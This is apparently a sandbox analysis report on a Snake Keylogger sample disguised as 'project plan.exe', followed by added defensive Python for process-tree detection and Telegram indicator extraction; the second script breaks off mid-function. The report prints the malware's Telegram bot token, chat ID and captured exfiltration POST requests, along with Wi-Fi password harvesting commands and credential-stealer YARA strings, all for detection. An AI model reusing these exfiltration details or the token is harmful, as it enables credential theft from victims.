

Windows Analysis Report
project plan.exe

Overview

General Information

Sample name: project plan.exe
Analysis ID: 1466687
MD5: ec263cafbd93faeb218574586bf8e45f
SHA1: 2d37614bb075a8580fc5fe7851dedbc88911944c
SHA256: 7c801923836d6b568d00a338b6bcf41889a7a9150c41a4274c21e50d9eb86f33

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Capture Wi-Fi password
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Injects a PE file into a foreign process
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
One or more processes crash
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • project plan.exe (PID: 1536 cmdline: "C:\Users\user\Desktop\project plan.exe" MD5: EC263CAFBD93FAEB218574586BF8E45F)
    • conhost.exe (PID: 1568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 6132 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • netsh.exe (PID: 3580 cmdline: "netsh" wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 5836 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • WerFault.exe (PID: 4956 cmdline: C:\Windows\system32\WerFault.exe -u -p 1536 -s 1028 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger with many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
Malware Configuration

Telegram RAT: {"C2 url": "https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendMessage"}
Snake Keylogger: {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendMessage?chat_id=5361285164"}
Yara Overview

Source | Rule | Description | Author | Strings
00000003.00000002.3221467298.0000000002D35000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  Matched strings:
  • 0x13d70:$a1: get_encryptedPassword
  • 0x1405c:$a2: get_encryptedUsername
  • 0x13b7c:$a3: get_timePasswordChanged
  • 0x13c77:$a4: get_passwordField
  • 0x13d86:$a5: set_encryptedPassword
  • 0x153af:$a7: get_logins
  • 0x15312:$a10: KeyLoggerEventArgs
  • 0x14f83:$a11: KeyLoggerEventArgsEventHandler
23 further memory-dump Yara matches are not shown in this extract.
Source | Rule | Description | Author | Strings
0.2.project plan.exe.16766a241c0.3.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.project plan.exe.16766a241c0.3.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
0.2.project plan.exe.16766a241c0.3.unpack | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
0.2.project plan.exe.16766a241c0.3.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  Matched strings:
  • 0x12170:$a1: get_encryptedPassword
  • 0x1245c:$a2: get_encryptedUsername
  • 0x11f7c:$a3: get_timePasswordChanged
  • 0x12077:$a4: get_passwordField
  • 0x12186:$a5: set_encryptedPassword
  • 0x137af:$a7: get_logins
  • 0x13712:$a10: KeyLoggerEventArgs
  • 0x13383:$a11: KeyLoggerEventArgsEventHandler
0.2.project plan.exe.16766a241c0.3.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  Matched strings:
  • 0x197bc:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x189ee:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x18e21:$a4: \Orbitum\User Data\Default\Login Data
  • 0x19f48:$a5: \Kometa\User Data\Default\Login Data
33 further unpacked-PE Yara matches are not shown in this extract.

                Stealing of Sensitive Information

Source: Process started | Author: Joe Security
Data:
  Command: "netsh" wlan show profile
  CommandLine: "netsh" wlan show profile
  CommandLine|base64offset|contains: V
  Image: C:\Windows\SysWOW64\netsh.exe
  NewProcessName: C:\Windows\SysWOW64\netsh.exe
  OriginalFileName: C:\Windows\SysWOW64\netsh.exe
  ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
  ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  ParentProcessId: 6132
  ParentProcessName: RegAsm.exe
  ProcessCommandLine: "netsh" wlan show profile
  ProcessId: 3580
  ProcessName: netsh.exe
                No Snort rule has matched
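The process tree earlier in the report and the Sigma event above have a detectable shape: a .NET Framework utility (RegAsm.exe) started with no arguments by a binary on the user's Desktop, and then netsh wlan show profile spawned from that utility rather than from a shell. The following Python is an added example for this report, not Joe Sandbox code and not the Sigma rule that fired. It runs both checks over a constructed process-creation log that mirrors the tree (PIDs, images and command lines copied from the report; the explorer.exe parent and the benign cmd.exe/netsh pair at the end are added as controls). The host-process list, the shell list and the user-writable-path pattern are the author's assumptions, not part of the report.

```python
"""Process-tree detections for the RegAsm.exe -> netsh chain in this report.

Added example for this report, not Joe Sandbox code. SAMPLE_EVENTS is a
constructed process-creation log that mirrors the report's process tree
(PIDs, images and command lines copied from it; the explorer.exe parent
and the benign cmd.exe/netsh pair at the end are added as controls).
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class Finding:
    kind: str
    pid: int
    severity: str
    chain: List[str]  # image basenames, outermost known ancestor first


SAMPLE_EVENTS = [
    ProcEvent(4000, 0, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1536, 4000, r"C:\Users\user\Desktop\project plan.exe", r'"C:\Users\user\Desktop\project plan.exe"'),
    ProcEvent(1568, 1536, r"C:\Windows\system32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(6132, 1536, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"'),
    ProcEvent(3580, 6132, r"C:\Windows\SysWOW64\netsh.exe", '"netsh" wlan show profile'),
    ProcEvent(3504, 3580, r"C:\Windows\system32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(5836, 1536, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"'),
    # Control (constructed): an administrator listing Wi-Fi profiles from cmd.exe.
    ProcEvent(6999, 4000, r"C:\Windows\System32\cmd.exe", '"C:\\Windows\\System32\\cmd.exe"'),
    ProcEvent(7000, 6999, r"C:\Windows\System32\netsh.exe", "netsh wlan show profile"),
]

# Assumed lists: .NET Framework utilities that do nothing useful without
# arguments and are therefore used as hollowing hosts; shells an admin types into.
DOTNET_HOSTS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "applaunch.exe"}
INTERACTIVE_SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe"}
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\(desktop|downloads|appdata)\\", re.I)
WLAN_PROFILE = re.compile(r"\bwlan\s+show\s+profiles?\b", re.I)
# First token (quoted or bare) is the program; everything after it is arguments.
ARGS = re.compile(r'^\s*(?:"[^"]*"|\S+)\s*(.*)$', re.S)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def arguments(cmdline: str) -> str:
    return ARGS.match(cmdline).group(1).strip()


def ancestry(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[str]:
    """Walk ppid links upward; stop at an unknown parent or a pid cycle."""
    chain, seen = [], set()
    while ev is not None and ev.pid not in seen:
        seen.add(ev.pid)
        chain.append(basename(ev.image))
        ev = by_pid.get(ev.ppid)
    return list(reversed(chain))


def detect(events: List[ProcEvent]) -> List[Finding]:
    by_pid = {e.pid: e for e in events}
    findings: List[Finding] = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        name, args = basename(ev.image), arguments(ev.cmdline)
        parent_name = basename(parent.image) if parent else ""

        # 1. Argument-less .NET utility launched by something in a user-writable
        #    directory: the shape of process hollowing, visible before any payload runs.
        if name in DOTNET_HOSTS and args == "" and parent and USER_WRITABLE.search(parent.image):
            findings.append(Finding("hollowed_dotnet_host", ev.pid, "high", ancestry(ev, by_pid)))

        # 2. Wi-Fi profile enumeration. key=clear dumps the PSK outright; a parent
        #    that is not an interactive shell means nobody is typing this.
        if name == "netsh.exe" and WLAN_PROFILE.search(args):
            scripted = parent_name not in INTERACTIVE_SHELLS
            severity = "high" if scripted or "key=clear" in args.lower() else "low"
            findings.append(Finding("wifi_profile_enum", ev.pid, severity, ancestry(ev, by_pid)))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.severity:<4} {f.kind:<22} pid={f.pid} chain={' > '.join(f.chain)}")
```

Severity comes from context rather than from the command alone: `wlan show profile` without `key=clear` only lists SSIDs, so from an interactive shell it is rated low, but from RegAsm.exe there is no legitimate reason for it. netsh accepts abbreviated keywords, so a regex on the full words is a starting point, not a finished rule. The chain for PID 3580 comes out as explorer.exe > project plan.exe > regasm.exe > netsh.exe, the report's tree in one line; note that the 32-bit RegAsm.exe from the Framework (not Framework64) directory spawns netsh from SysWOW64, exactly as the Sigma event records.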



                AV Detection

Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendMessage?chat_id=5361285164"}
Source: RegAsm.exe.6132.3.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendMessage"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: project plan.exe | Joe Sandbox ML: detected

                Exploits

Source: Yara match | File source: 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: project plan.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Windows.Forms.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: mscorlib.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Drawing.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Windows.Forms.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Drawing.pdbX source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: mscorlib.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Drawing.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Core.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Windows.Forms.pdb; source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Drawing.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Core.pdbH source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Core.ni.pdb source: WERDE5D.tmp.dmp.7.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 00F6A3BFh | 3_2_00F6A100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 00F6969Fh | 3_2_00F693E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 00F68848h | 3_2_00F68430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 00F69AFFh | 3_2_00F69841
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 00F69F5Fh | 3_2_00F69CA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 00F678A9h | 3_2_00F66DDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 00F6923Fh | 3_2_00F68E97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 00F68109h | 3_2_00F67E49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 3_2_00F66300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 00F68848h | 3_2_00F68429
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 00F68848h | 3_2_00F68776
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 3_2_00F66933
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 3_2_00F66B14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06146CE1h | 3_2_06146A38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06143D19h | 3_2_06143A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06147139h | 3_2_06146E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06144171h | 3_2_06143EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06147591h | 3_2_061472E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 061445C9h | 3_2_06144320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 061479E9h | 3_2_06147740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06144A21h | 3_2_06144778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06147E41h | 3_2_06147B98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06144E79h | 3_2_06144BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06148299h | 3_2_06147FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 061452D1h | 3_2_06145028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 0614F2D1h | 3_2_0614F028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 0614EAF9h | 3_2_0614E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 061486F1h | 3_2_06148448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06145729h | 3_2_06145480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 0614F729h | 3_2_0614F480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06148B49h | 3_2_061488A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06145B81h | 3_2_061458D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 0614FB81h | 3_2_0614F8D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06148FA1h | 3_2_06148CF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06145FD9h | 3_2_06145D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 061493F9h | 3_2_06149150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06146431h | 3_2_06146188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06146889h | 3_2_061465E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 3_2_0614CA5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 3_2_0614CA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 3_2_0614CD86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 061626F9h | 3_2_06162450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06160741h | 3_2_06160498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 061602E9h | 3_2_06160040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06162FA9h | 3_2_06162D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06162B51h | 3_2_061628A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06160B99h | 3_2_061608F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 061619F2h | 3_2_06161748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06163859h | 3_2_061635B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06163401h | 3_2_06163158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 061622A1h | 3_2_06161FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 06161E49h | 3_2_06161BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 3_2_06169F14

                Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE
Source: global traffic | HTTP traffic detected:
  POST /bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument?chat_id=5361285164&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
  Content-Type: multipart/form-data; boundary=------------------------8dc9b102694a6ea
  Host: api.telegram.org
  Content-Length: 534
  Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 132.226.247.73
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: checkip.dyndns.org
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected:
  POST /bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument?chat_id=5361285164&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
  Content-Type: multipart/form-data; boundary=------------------------8dc9b102694a6ea
  Host: api.telegram.org
  Content-Length: 534
  Connection: Keep-Alive
Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002E57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002D35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3221467298.0000000002D29000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002C71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: project plan.exe, 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002C71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.7.dr | String found in binary or memory: http://upx.sf.net
Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: project plan.exe, 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument?chat_id=5361
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2
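The two requests captured above (the checkip.dyndns.org lookup with an IE 6 user agent, and the sendDocument POST to api.telegram.org) and the configuration the extractors pulled from memory all reduce to the same handful of indicators. The following Python is an added example for this report, not Joe Sandbox code and not part of the sample. It parses the request heads exactly as the report shows them (reconstructed here with CRLF line breaks; the 534-byte multipart body is not in the report and is not modelled), extracts the bot id, the full bot token, the chat_id and the percent-decoded caption, and flags the external IP lookup by host and by its legacy user agent. The IP-check host list and the user-agent pattern are the author's assumptions, not something the report states.

```python
"""Turn the captured Snake Keylogger HTTP requests into indicators.

Added example for this report; not Joe Sandbox code and not part of the
malware. The two request heads below are reconstructed from the report's
'HTTP traffic detected' lines with CRLF line breaks restored. The multipart
body of the POST (Content-Length: 534) is not in the report and is omitted.
"""
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample input: request heads only, as shown in the report.
SAMPLE_REQUESTS = [
    b"GET / HTTP/1.1\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)\r\n"
    b"Host: checkip.dyndns.org\r\n"
    b"Connection: Keep-Alive\r\n"
    b"\r\n",
    b"POST /bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument"
    b"?chat_id=5361285164&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker"
    b"%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=------------------------8dc9b102694a6ea\r\n"
    b"Host: api.telegram.org\r\n"
    b"Content-Length: 534\r\n"
    b"Connection: Keep-Alive\r\n"
    b"\r\n",
]

# Bot API targets look like /bot<bot_id>:<secret>/<method>; the whole
# "<bot_id>:<secret>" string is the credential the operator configured.
BOT_PATH = re.compile(r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)$")
# Assumed list of "what is my IP" services; the report only shows dyndns.
IP_CHECK_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com"}
# Assumed fingerprint: no current browser claims IE 6 or .NET CLR 1.0.
LEGACY_UA = re.compile(r"MSIE [1-9]\.\d|\.NET CLR ?1\.0")


def parse_request_head(raw: bytes) -> dict:
    """Split an HTTP/1.1 request head into method, target and lower-cased headers."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def telegram_exfil(req: dict) -> Optional[dict]:
    """Extract bot id, token, chat id and decoded caption from a Bot API call."""
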